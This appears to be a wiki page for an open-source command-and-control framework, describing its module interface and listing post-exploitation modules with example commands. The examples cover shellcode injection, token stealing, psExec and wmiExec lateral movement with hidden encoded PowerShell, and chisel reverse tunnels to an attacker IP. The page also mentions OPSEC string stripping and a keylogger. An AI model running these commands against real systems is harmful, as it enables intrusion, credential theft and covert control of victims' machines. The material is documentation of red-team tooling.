Skip to content

6 ‐ Modules

Maxime dcb edited this page Nov 17, 2024 · 4 revisions

Introduction

Modules are additional functionalities for the TeamServer and the Beacon. They are libraries loaded dynamically at runtime. On the Beacon side they never touch the disk.

They can be compiled 3 ways:

  • Linux library .so for the TeamServer that are loaded by the TeamServer at start. They are stored in TeamServerModules.

image

image

  • Linux library .so for the Beacon, that are loaded by the Beacon when send with the loadModule instruction. When compiled to this end, they don't contain any static strings and only the necessary functions.

image

  • Windows library .dll for the Beacon, that are loaded by the Beacon when send with the loadModule instruction. When compiled to this end, they don't contain any static strings, and only the necessary functions.

image

The same files are compile in 3 different ways for OPSEC considerations.

Implementation

Modules are classes inheriting from ModuleCmd that implement 5 members functions and export a constructor function named moduleNameConstuctor:

image

virtual int init(std::vector<std::string>& splitedCmd, C2Message& c2Message) = 0;
virtual int process(C2Message& c2Message, C2Message& c2RetMessage) = 0;
virtual int followUp(const C2Message &c2RetMessage) {return 0;};
virtual int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg) {return 0;};
virtual int recurringExec (C2Message& c2RetMessage) {return 0;};

init

init(std::vector<std::string>& splitedCmd, C2Message& c2Message)

Executed TeamServer side. Prepare the message send to the beacon. It can contain strings that are not embedded in the module send to the beacon when compiled in release mode.

process

int process(C2Message& c2Message, C2Message& c2RetMessage)

Executed in Beacon side. Performe the main functionalities, the result is store in RetMessage. It shouldn't contain any static strings, if an error occur it fills the errorCode of C2Message.

followUp

int followUp(const C2Message &c2RetMessage)

Executed TeamServer side in case their is some action to be taken after the execution (Beacon side) of the module. For exemple in the case of download, the followUp is in charge of saving the file into disk. It can be omitted if their is nothing to do for a specific module.

errorCodeToMsg

int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg)

Executed TeamServer side, translate any error code into the associated message to be send to the client.

recurringExec

int recurringExec (C2Message& c2RetMessage)

Executed Beacon side in the case where their is a recurring action to be taken. For exemple the KeyLogger send any additional key pressed to the TeamServer each time their is a new communication made from the Beacon to the TeamServer.

Inherent Modules

Beacon spawn with whose modules already loaded, they are statically linked at runtime:

Modules Description
loadModule Load module DLL file on the memory of the beacon, giving the beacon this capability.
Load the DLL from the given path, if it's not found try the default ../Modules/ path.exemple:
- loadModule /tools/PrintWorkingDirectory.dll
unloadModule Unload module DLL loaded by loadModule.
socks Start a socks5 server on the TeamServer and tunnel the traffic to the Beacon.
The tunneling is done using the communication protocol of the beacon.
Only one socks5 server can be opened at a time.
exemple:
- socks start 1080
- socks stop
listener Start a tcp or smb listener on the beacon.
sleep Set the sleep time in sec for the beacon.
end Stop the beacon.

Additional Modules

Those modules are provided with the Release, as DLL/SO. They can be specific for Windows or Linux:

Modules Description
assemblyExec Execute shellcode in a process (notepad.exe), wait for the end of execution or a timeout (120 sec). Retrieve the output.
Use -r to use a shellcode file.
If -e or -d are given, use donut to create the shellcode.
exemple:
- assemblyExec -r ./shellcode.bin
- assemblyExec -e ./program.exe arg1 arg2...
- assemblyExec -e ./Seatbelt.exe -group=system
- assemblyExec -d ./test.dll method arg1 arg2...
upload Upload a file from the attacker machine to the victime machine
exemple:
- upload c:\temp\toto.exe c:\temp\toto.exe
download Download a file from victime machine to the attacker machine
exemple:
- download c:\temp\toto.exe c:\temp\toto.exe
run Run new process on the system.
If the cmd is a system cmd use the following syntax 'cmd /c command'.
The beacon wait for the cmd to end and provide the output.'
exemple:
- run whoami
- run cmd /c dir
- run .\Seatbelt.exe -group=system
inject Inject shellcode in the pid process. For linux must be root or at least have ptrace capability.
No output is provided.
Use -r to use a shellcode file.
If -e or -d are given, use donut to create the shellcode.
If pid is negative a new process is created for the injection.
exemple:
- inject -r ./calc.bin 2568
- inject -e ./beacon.exe pid arg1 arg2
- inject -d ./calc.dll pid method arg1 arg2
pwd PrintWorkingDirectory
cd ChangeDirectory
ls ListDirectory
ps ListProcesses
makeToken Create a token from user and password and impersonate it.
exemple:
- makeToken DOMAIN\Username Password
rev2self Drop the impersonation of a token, created with makeToken
exemple:
- rev2self
stealToken Steal a token and impersonate the it. You must have administrator privilege.
exemple:
- stealToken pid
coffLoader Load a .o coff file and execute it.
Coff take packed argument as entry, you get to specify the type as a string of [Z,z,s,i] for wstring, string, short, int.
exemple:
- coffLoader ./dir.x64.o go Zs c:\ 0
- coffLoader ./whoami.x64.o
powershell Execute a powershell command.
To be sure to get the output of the commande do 'cmd
kerberosUseTicket Import a kerberos ticket from a file to the curent LUID.
exemple:
- KerberosUseTicket /tmp/ticket.kirbi
psExec Create an exe on an SMB share of the victime and a service to launch this exec using system.
The exe must be a service binary or inject into another process.
You must have the right kerberos tickets.
exemple:
- psExec m3dc.cyber.local /tmp/implant.exe
- psExec 10.9.20.10 /tmp/implant.exe
wmiExec Execute a command through Windows Management Instrumentation (WMI).
The user have to be administrator of the remote machine.
Can be use with credentials or with kerberos authentication.
To use with kerberos, the ticket must be in memory (use Rubeus).
exemple:
- wmiExec -u DOMAIN\Username Password target powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AV
- wmiExec -k DOMAIN\dc target powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AV
spawnAs Launch a new process as another user, with the given credentials.
exemple:
- spawnAs DOMAIN\Username Password powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgA...
- spawnAs .\Administrator Password C:\Users\Public\Documents\implant.exe
chisel Launch chisel in a thread on the remote server.
No output is provided.
exemple:
- chisel status
- chisel stop pid
Reverse Socks Proxy:
- chisel /tools/chisel.exe client ATTACKING_IP:LISTEN_PORT R:socks
- On the attacking machine: chisel server -p LISTEN_PORT --reverse
Remote Port Forward:
- chisel /tools/chisel.exe client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:REMOT_PORT
- On the attacking machine: chisel server -p LISTEN_PORT --reverse
tree Tree